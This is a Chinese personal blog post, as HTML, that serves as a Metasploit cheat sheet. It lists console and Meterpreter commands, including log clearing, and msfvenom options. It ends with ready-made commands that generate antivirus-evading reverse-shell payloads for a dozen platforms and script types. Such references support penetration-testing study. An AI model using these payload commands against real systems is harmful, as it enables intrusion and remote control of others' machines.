<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>工具篇之Metasploit | SKid's Blog</title><meta name="description" content="Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。  一、启动MSF12345&#x2F;etc&#x2F;init.d&#x2F;postgresql start    &#x2F;&#x2F;启动数据库msfconsole   &#x2F;&#x2F;启动MSFmsfdb i"><meta name="keywords" content="工具,msf"><meta name="author" content="SKid"><meta name="copyright" content="SKid"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.png"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="dns-prefetch" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin="crossorigin"/><link rel="dns-prefetch" href="https://fonts.googleapis.com"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="dns-prefetch" href="//busuanzi.ibruce.info"/><meta name="twitter:card" content="summary"><meta name="twitter:title" content="工具篇之Metasploit"><meta name="twitter:description" content="Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。  一、启动MSF12345&#x2F;etc&#x2F;init.d&#x2F;postgresql start    &#x2F;&#x2F;启动数据库msfconsole   &#x2F;&#x2F;启动MSFmsfdb i"><meta name="twitter:image" content="https://skid0.coding.net/p/picture/d/picture/git/raw/master/metasploit.jpg"><meta property="og:type" content="article"><meta property="og:title" content="工具篇之Metasploit"><meta property="og:url" content="http://skid.hackclub.cn/2020/05/19/%E5%B7%A5%E5%85%B7%E7%AF%87%E4%B9%8BMetasploit/"><meta property="og:site_name" content="SKid's Blog"><meta property="og:description" content="Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。  一、启动MSF12345&#x2F;etc&#x2F;init.d&#x2F;postgresql start    &#x2F;&#x2F;启动数据库msfconsole   &#x2F;&#x2F;启动MSFmsfdb i"><meta property="og:image" content="https://skid0.coding.net/p/picture/d/picture/git/raw/master/metasploit.jpg"><meta property="article:published_time" content="2020-05-19T03:59:04.000Z"><meta property="article:modified_time" content="2020-05-19T08:14:32.447Z"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>var autoChangeMode = '1'
var t = Cookies.get("theme")
if (autoChangeMode == '1'){
  var isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
  var isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
  var isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined){
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport){
      console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour < 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
  }
  } else if (t == 'light') activateLightMode()
  else activateDarkMode()

} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="http://skid.hackclub.cn/2020/05/19/%E5%B7%A5%E5%85%B7%E7%AF%87%E4%B9%8BMetasploit/"><link rel="prev" title="红方人员实战手册" href="http://skid.hackclub.cn/2020/06/12/%E7%BA%A2%E6%96%B9%E4%BA%BA%E5%91%98%E5%AE%9E%E6%88%98%E6%89%8B%E5%86%8C/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://xxx/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  highlightCopy: true,
  highlightLang: true,
  highlightShrink: 'false',
  isFontAwesomeV5: false,
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
  
}</script><script>var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isSidebar: true  
  }</script><noscript><style>
#page-header {
  opacity: 1
}
.justified-gallery img{
  opacity: 1
}
</style></noscript><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="SKid's Blog" type="application/atom+xml">
</head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/head.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">4</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">6</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fa fa-list" aria-hidden="true"></i><span> 更多</span><i class="fa fa-chevron-down menus-expand" aria-hidden="true"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fa fa-music"></i><span> Music</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fa fa-film"></i><span> Movie</span></a></li></ul></div></div></div></div><i class="fa fa-arrow-right on" id="toggle-sidebar" aria-hidden="true">     </i><div id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#一、启动MSF"><span class="toc-number">1.</span> <span class="toc-text">一、启动MSF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#二、MSF模块"><span class="toc-number">2.</span> <span class="toc-text">二、MSF模块</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#三、MSF常用命令"><span class="toc-number">3.</span> <span class="toc-text">三、MSF常用命令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#四、MSF使用步骤"><span class="toc-number">4.</span> <span class="toc-text">四、MSF使用步骤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#五、Meterpreter"><span class="toc-number">5.</span> <span class="toc-text">五、Meterpreter</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#5-1-基础命令"><span class="toc-number">5.0.1.</span> <span class="toc-text">5.1 基础命令</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#六、Msfvenom"><span class="toc-number">6.</span> <span class="toc-text">六、Msfvenom</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#6-1-常见参数"><span class="toc-number">6.0.1.</span> <span class="toc-text">6.1 常见参数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6-2-常见payload生成命令"><span class="toc-number">6.0.2.</span> <span class="toc-text">6.2 常见payload生成命令</span></a></li></ol></li></ol></li></ol></div></div></div><div id="body-wrap"><div class="post-bg" id="nav" style="background-image: url(https://skid0.coding.net/p/picture/d/picture/git/raw/master/metasploit.jpg)"><div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">SKid's Blog</a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fa fa-list" aria-hidden="true"></i><span> 更多</span><i class="fa fa-chevron-down menus-expand" aria-hidden="true"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fa fa-music"></i><span> Music</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fa fa-film"></i><span> Movie</span></a></li></ul></div></div><span class="toggle-menu close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span></span></div><div id="post-info"><div id="post-title"><div class="posttitle">工具篇之Metasploit</div></div><div id="post-meta"><div class="meta-firstline"><time class="post-meta__date"><span class="post-meta__date-created" title="发表于 2020-05-19 11:59:04"><i class="fa fa-calendar" aria-hidden="true"></i> 发表于 2020-05-19</span><span class="post-meta__separator">|</span><span class="post-meta__date-updated" title="更新于 2020-05-19 16:14:32"><i class="fa fa-history" aria-hidden="true"></i> 更新于 2020-05-19</span></time></div><div class="meta-secondline"> </div><div class="meta-thirdline"><span class="post-meta-pv-cv"><i class="fa fa-eye post-meta__icon" aria-hidden="true"> </i><span>阅读量:</span><span id="busuanzi_value_page_pv"></span></span><span class="post-meta-commentcount"></span></div></div></div></div><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><blockquote>
<p>Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。</p>
</blockquote>
<h2 id="一、启动MSF"><a href="#一、启动MSF" class="headerlink" title="一、启动MSF"></a>一、启动MSF</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;etc&#x2F;init.d&#x2F;postgresql start    &#x2F;&#x2F;启动数据库</span><br><span class="line">msfconsole   &#x2F;&#x2F;启动MSF</span><br><span class="line">msfdb init   &#x2F;&#x2F;初始化数据库</span><br><span class="line">workspace    &#x2F;&#x2F;工作空间</span><br><span class="line">workspace -a msf   &#x2F;&#x2F;新建工作空间</span><br></pre></td></tr></table></figure>

<h2 id="二、MSF模块"><a href="#二、MSF模块" class="headerlink" title="二、MSF模块"></a>二、MSF模块</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">graph TD</span><br><span class="line">A[metasploit]</span><br><span class="line">A--&gt;B[Auxiliaries]</span><br><span class="line">A --&gt;C[Payloads]</span><br><span class="line">A --&gt;D[Exploit]</span><br><span class="line">A --&gt;E[Encoders]</span><br><span class="line">A --&gt;F[NOPS]</span><br><span class="line">A --&gt;G[Post]</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th align="center">模块名</th>
<th align="center">介绍</th>
</tr>
</thead>
<tbody><tr>
<td align="center">Auxiliaries</td>
<td align="center">辅助模块，用于扫描、发现漏洞、探测信息等工作</td>
</tr>
<tr>
<td align="center">Payloads</td>
<td align="center">攻击载荷模块，目标系统被渗透攻击之后需要执行的代码</td>
</tr>
<tr>
<td align="center">Exploit</td>
<td align="center">渗透攻击模块，利用已发现的漏洞对远程目标系统进行攻击、植入并运行攻击载荷，从而控制目标系统</td>
</tr>
<tr>
<td align="center">Encoders</td>
<td align="center">编码器模块，将攻击载荷进行编码，绕过杀软</td>
</tr>
<tr>
<td align="center">NOPS</td>
<td align="center">空指令模块，为了避免攻击载荷在执行的过程中出现随机地址和返回地址错误而在执行shellcode之前加入一些空指令，使得在执行shellcode时有一个较大的安全着陆区</td>
</tr>
<tr>
<td align="center">Post</td>
<td align="center">后渗透攻击模块，在受控系统中进行各种各样的后渗透攻击动作，比如获取敏感信息、进一步拓展、实施跳板攻击等</td>
</tr>
</tbody></table>
<h2 id="三、MSF常用命令"><a href="#三、MSF常用命令" class="headerlink" title="三、MSF常用命令"></a>三、MSF常用命令</h2><ul>
<li>核心命令</li>
</ul>
<table>
<thead>
<tr>
<th align="center">命令</th>
<th align="center">介绍</th>
</tr>
</thead>
<tbody><tr>
<td align="center">get</td>
<td align="center">获取参数值</td>
</tr>
<tr>
<td align="center">getg</td>
<td align="center">获取全局参数值</td>
</tr>
<tr>
<td align="center">set</td>
<td align="center">设置参数值</td>
</tr>
<tr>
<td align="center">setg</td>
<td align="center">设置全局参数值</td>
</tr>
<tr>
<td align="center">load</td>
<td align="center">加载插件</td>
</tr>
<tr>
<td align="center">route</td>
<td align="center">配置路由</td>
</tr>
<tr>
<td align="center">sessions</td>
<td align="center">会话信息</td>
</tr>
<tr>
<td align="center">exit</td>
<td align="center">退出msf</td>
</tr>
</tbody></table>
<ul>
<li>模块命令</li>
</ul>
<table>
<thead>
<tr>
<th align="center">命令</th>
<th align="center">介绍</th>
</tr>
</thead>
<tbody><tr>
<td align="center">advanced</td>
<td align="center">高级配置项</td>
</tr>
<tr>
<td align="center">back</td>
<td align="center">返回上一层</td>
</tr>
<tr>
<td align="center">info</td>
<td align="center">显示信息</td>
</tr>
<tr>
<td align="center">options</td>
<td align="center">配置项</td>
</tr>
<tr>
<td align="center">reload_all</td>
<td align="center">重新从默认路径导入插件</td>
</tr>
<tr>
<td align="center">search</td>
<td align="center">搜索模块</td>
</tr>
<tr>
<td align="center">show</td>
<td align="center">显示</td>
</tr>
<tr>
<td align="center">use</td>
<td align="center">使用模块</td>
</tr>
</tbody></table>
<ul>
<li>工作命令</li>
</ul>
<table>
<thead>
<tr>
<th align="center">命令</th>
<th align="center">介绍</th>
</tr>
</thead>
<tbody><tr>
<td align="center">handler</td>
<td align="center">开启一个payload处理器作为job</td>
</tr>
<tr>
<td align="center">jobs</td>
<td align="center">显示工作</td>
</tr>
<tr>
<td align="center">kill</td>
<td align="center">停止某个job</td>
</tr>
<tr>
<td align="center">rename_job</td>
<td align="center">重命名job</td>
</tr>
</tbody></table>
<ul>
<li>数据库备份命令</li>
</ul>
<table>
<thead>
<tr>
<th align="center">命令</th>
<th align="center">介绍</th>
</tr>
</thead>
<tbody><tr>
<td align="center">workspace</td>
<td align="center">工作空间</td>
</tr>
<tr>
<td align="center">db_export</td>
<td align="center">导出数据库结果</td>
</tr>
<tr>
<td align="center">db_import</td>
<td align="center">将结果导入到数据库中</td>
</tr>
<tr>
<td align="center">db_nmap</td>
<td align="center">MSF调用nmap</td>
</tr>
<tr>
<td align="center">hosts</td>
<td align="center">列出所有主机信息</td>
</tr>
<tr>
<td align="center">services</td>
<td align="center">列出所有服务信息</td>
</tr>
<tr>
<td align="center">vulns</td>
<td align="center">列出所有漏洞信息</td>
</tr>
<tr>
<td align="center">db_status</td>
<td align="center">数据库连接状态</td>
</tr>
</tbody></table>
<h2 id="四、MSF使用步骤"><a href="#四、MSF使用步骤" class="headerlink" title="四、MSF使用步骤"></a>四、MSF使用步骤</h2><blockquote>
<p>1.调用模块</p>
<p>2.配置参数</p>
<p>3.获取会话</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">graph TD</span><br><span class="line">A[攻击者] --&gt; B[调用模块]</span><br><span class="line">B --&gt; C[配置参数]</span><br><span class="line">C --&gt; D[获取会话]</span><br><span class="line">D --&gt; E[受害者]</span><br><span class="line">E --&gt; |会话|A</span><br></pre></td></tr></table></figure>

<h2 id="五、Meterpreter"><a href="#五、Meterpreter" class="headerlink" title="五、Meterpreter"></a>五、Meterpreter</h2><blockquote>
<p>Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个MeterpreterShell的链接。</p>
</blockquote>
<h4 id="5-1-基础命令"><a href="#5-1-基础命令" class="headerlink" title="5.1 基础命令"></a>5.1 基础命令</h4><table>
<thead>
<tr>
<th align="center">命令</th>
<th align="center">介绍</th>
</tr>
</thead>
<tbody><tr>
<td align="center">background</td>
<td align="center">让会话放在后台运行</td>
</tr>
<tr>
<td align="center">sessions</td>
<td align="center">获取会话</td>
</tr>
<tr>
<td align="center">shell</td>
<td align="center">切换windows下cmd终端</td>
</tr>
<tr>
<td align="center">upload</td>
<td align="center">上传</td>
</tr>
<tr>
<td align="center">dowmload</td>
<td align="center">下载</td>
</tr>
<tr>
<td align="center">ipconfig</td>
<td align="center">查看目标的网络信息</td>
</tr>
<tr>
<td align="center">portwd</td>
<td align="center">端口转发</td>
</tr>
<tr>
<td align="center">route</td>
<td align="center">显示路由信息</td>
</tr>
<tr>
<td align="center">ps</td>
<td align="center">获取进程信息</td>
</tr>
<tr>
<td align="center">migrate</td>
<td align="center">迁移进程</td>
</tr>
<tr>
<td align="center">getpid</td>
<td align="center">获取当前会话进程的pid值</td>
</tr>
<tr>
<td align="center">getuid</td>
<td align="center">获取当前会话的用户名</td>
</tr>
<tr>
<td align="center">kill</td>
<td align="center">停止进程</td>
</tr>
<tr>
<td align="center">sysinfo</td>
<td align="center">显示系统信息</td>
</tr>
<tr>
<td align="center">shutdown</td>
<td align="center">关闭目标设备</td>
</tr>
<tr>
<td align="center">clearav</td>
<td align="center">清除日志</td>
</tr>
</tbody></table>
<h2 id="六、Msfvenom"><a href="#六、Msfvenom" class="headerlink" title="六、Msfvenom"></a>六、Msfvenom</h2><blockquote>
<p>Msfpayload用于从攻击载荷中生成二进制文件，Msfencode则用于使用不同编码技术对该二进制文件进行编码。Msfvenom工具则结合了二者的功能，并在生成可隐蔽执行漏洞利用代码方面发挥重要作用。</p>
</blockquote>
<h4 id="6-1-常见参数"><a href="#6-1-常见参数" class="headerlink" title="6.1 常见参数"></a>6.1 常见参数</h4><table>
<thead>
<tr>
<th align="center">参数</th>
<th align="center">介绍</th>
</tr>
</thead>
<tbody><tr>
<td align="center">-l,–list</td>
<td align="center">列出[type]的所有模块。类型包括：有效载荷、编码器、nops、平台、archs、加密、格式等</td>
</tr>
<tr>
<td align="center">-p,–paylist</td>
<td align="center">指定payload</td>
</tr>
<tr>
<td align="center">-f,–format</td>
<td align="center">输出格式</td>
</tr>
<tr>
<td align="center">-e,–encoder</td>
<td align="center">设置编码器</td>
</tr>
<tr>
<td align="center">–smallest</td>
<td align="center">生成最小的有效载荷</td>
</tr>
<tr>
<td align="center">–encrypt</td>
<td align="center">设置shellcode编码或加密类型</td>
</tr>
<tr>
<td align="center">–encrypt-key</td>
<td align="center">密钥</td>
</tr>
<tr>
<td align="center">–encrypt-iv</td>
<td align="center">初始化encrypt</td>
</tr>
<tr>
<td align="center">-a,–arch</td>
<td align="center">设置架构</td>
</tr>
<tr>
<td align="center">–platform</td>
<td align="center">设置payload的目标平台</td>
</tr>
<tr>
<td align="center">-o,–out</td>
<td align="center">指定输出路径</td>
</tr>
<tr>
<td align="center">-b,–bad-chars</td>
<td align="center">去除坏字符</td>
</tr>
<tr>
<td align="center">-n,–nopsled</td>
<td align="center">在有效载荷上添加[length]大小的nopsled</td>
</tr>
<tr>
<td align="center">–pad-nops</td>
<td align="center">使用由-n&lt;length&gt;指定的nopsled大小作为总有效负载带下，从而执行减法以预先填充数量(nops减去有效负载长度)</td>
</tr>
<tr>
<td align="center">-s,–space</td>
<td align="center">生成的有效负载的最大大小</td>
</tr>
<tr>
<td align="center">–encoder-space</td>
<td align="center">生成的有效负载的最大大小</td>
</tr>
<tr>
<td align="center">-i,–iterations</td>
<td align="center">编码次数</td>
</tr>
<tr>
<td align="center">-c,–add-code</td>
<td align="center">指定要包含的win32 shellcode文件</td>
</tr>
<tr>
<td align="center">-x,–template</td>
<td align="center">指定要用作模板的自定义可执行文件</td>
</tr>
<tr>
<td align="center">-k,–keep</td>
<td align="center">保留–template行为并将有效负载注入新线程</td>
</tr>
<tr>
<td align="center">-v,–var-name</td>
<td align="center">指定用于某些输出格式的自定义变量名称</td>
</tr>
<tr>
<td align="center">-t,–timeout</td>
<td align="center">指定用于某些输出格式的自定义变量名称</td>
</tr>
<tr>
<td align="center">-h,–help</td>
<td align="center">显示帮助信息</td>
</tr>
</tbody></table>
<h4 id="6-2-常见payload生成命令"><a href="#6-2-常见payload生成命令" class="headerlink" title="6.2 常见payload生成命令"></a>6.2 常见payload生成命令</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">windows</span><br><span class="line">msfvenom -a x86 --platform Windows -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -e x86&#x2F;shikata&#x2F;ga&#x2F;nai -b &#39;\x00\x0a\xff&#39; -i 3 -f exe -o &#x2F;var&#x2F;www&#x2F;html&#x2F;payload.exe</span><br><span class="line"></span><br><span class="line">linux</span><br><span class="line">msfvenom -a x86 -p linux&#x2F;x86&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -f elf -o &#x2F;var&#x2F;www&#x2F;html&#x2F;payload.elf</span><br><span class="line"></span><br><span class="line">mac</span><br><span class="line">msfvenom -a x86 --platform osx -p osx&#x2F;x86&#x2F;shell_reverse_tcp LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -f macho -o &#x2F;var&#x2F;www&#x2F;html&#x2F;shell.macho</span><br><span class="line"></span><br><span class="line">android</span><br><span class="line">msfvenom -a x86 --platform Android -p android&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -f apk -o &#x2F;var&#x2F;www&#x2F;html&#x2F;shell.apk</span><br><span class="line"></span><br><span class="line">powershell</span><br><span class="line">msfvenom -a x86 --platform Windows -p windows&#x2F;powershell_reverse_tcp LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -e cmd&#x2F;powershell_base64 -i 5 -f raw -o &#x2F;var&#x2F;www&#x2F;html&#x2F;1.ps1</span><br><span class="line"></span><br><span class="line">php</span><br><span class="line">msfvenom -p php&#x2F;meterpreter_reverse_tcp LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -f raw &gt; shell.php cat shell.php | pbcopy &amp;&amp; echo &#39;&lt;?php &#39;|tr -d &#39;\n&#39; &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php</span><br><span class="line"></span><br><span class="line">asp</span><br><span class="line">msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -f asp &gt; shell.asp</span><br><span class="line"></span><br><span class="line">jsp</span><br><span class="line">msfvenom -p java&#x2F;jsp_shell_reverse_tcp LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -f raw &gt; shell.jsp</span><br><span class="line"></span><br><span class="line">war</span><br><span class="line">msfvenom -p java&#x2F;jsp_shell_reverse_tcp LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -f war &gt; shell.war</span><br><span class="line"></span><br><span class="line">python</span><br><span class="line">msfvenom -p cmd&#x2F;unix&#x2F;reverse_python LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -f raw &gt; shell.py</span><br><span class="line"></span><br><span class="line">bash</span><br><span class="line">msfvenom -p cmd&#x2F;unix&#x2F;reverse_bash LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -f raw &gt; shell.sh</span><br><span class="line"></span><br><span class="line">perl</span><br><span class="line">msfvenom -p cmd&#x2F;unix&#x2F;reverse_perl LHOST&#x3D;&lt;ip&gt; LPORT&#x3D;&lt;port&gt; -f raw &gt; shell.pl</span><br></pre></td></tr></table></figure>

</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">SKid</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://skid.hackclub.cn/2020/05/19/%E5%B7%A5%E5%85%B7%E7%AF%87%E4%B9%8BMetasploit/">http://skid.hackclub.cn/2020/05/19/%E5%B7%A5%E5%85%B7%E7%AF%87%E4%B9%8BMetasploit/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://skid.hackclub.cn" target="_blank">SKid's Blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%B7%A5%E5%85%B7/">工具</a><a class="post-meta__tags" href="/tags/msf/">msf</a></div><div class="post_share"><div class="social-share" data-image="https://skid0.coding.net/p/picture/d/picture/git/raw/master/vulhub.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"/><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button button--primary button--animated"> <i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="post-qr-code__img" src="/img/wechat.jpg" alt="微信"/><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="post-qr-code__img" src="/img/alipay.jpg" alt="支付寶"/><div class="post-qr-code__desc">支付寶</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/2020/06/12/%E7%BA%A2%E6%96%B9%E4%BA%BA%E5%91%98%E5%AE%9E%E6%88%98%E6%89%8B%E5%86%8C/"><img class="prev_cover" src="https://skid0.coding.net/p/picture/d/picture/git/raw/master/HW.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">红方人员实战手册</div></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/2020/06/15/工具篇之Empire/" title="工具篇之Empire"><img class="relatedPosts_cover" src="https://skid0.coding.net/p/picture/d/picture/git/raw/master/empire.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-06-15</div><div class="relatedPosts_title">工具篇之Empire</div></div></a></div></div><div class="clear_both"></div></div></article></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2020 By SKid</div><div class="footer_custom_text">Hi, welcome to my <a 